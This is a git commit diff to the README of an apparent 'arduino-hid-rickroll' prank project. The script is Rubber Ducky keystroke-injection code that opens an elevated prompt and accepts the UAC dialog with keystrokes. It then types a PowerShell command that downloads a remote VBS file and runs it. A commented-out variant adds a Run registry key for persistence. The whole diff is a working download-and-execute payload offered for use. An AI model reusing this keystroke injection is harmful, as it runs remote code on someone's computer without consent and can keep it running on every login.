Some updates (if you always want the latest version, check my repo)

This commit is contained in:
Sam van der Kris 2017-03-01 17:23:43 +01:00
parent cb5254ffd6
commit 6c88645e34
1 changed files with 11 additions and 7 deletions

View File

@ -2,12 +2,16 @@ GitLab repo: https://gitlab.com/WarKitteh/arduino-hid-rickroll
Ducky code:
`DELAY 1000
GUI r
DELAY 100
STRING cmd
DELAY 100
GUI x
DELAY 200
UP
REPEAT 7
DELAY 200
ENTER
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://pixelcoding.nl/download/rickroll.vbs','%TEMP%\rickroll.vbs'); && start %TEMP%\rickroll.vbs && exit
DELAY 100
DELAY 500
ALT y
DELAY 200
STRING powershell (new-object System.Net.WebClient).DownloadFile('https://gitlab.com/WarKitteh/arduino-hid-rickroll/raw/cee63bb220c856587462b29d61bdfc70c806805f/rickroll.vbs','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && exit
REM powershell (new-object System.Net.WebClient).DownloadFile('https://gitlab.com/WarKitteh/arduino-hid-rickroll/raw/cee63bb220c856587462b29d61bdfc70c806805f/rickroll.vbs','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TotallyNotShadyStartupItem /d %userprofile%\rickroll.vbs && exit
DELAY 200
ENTER`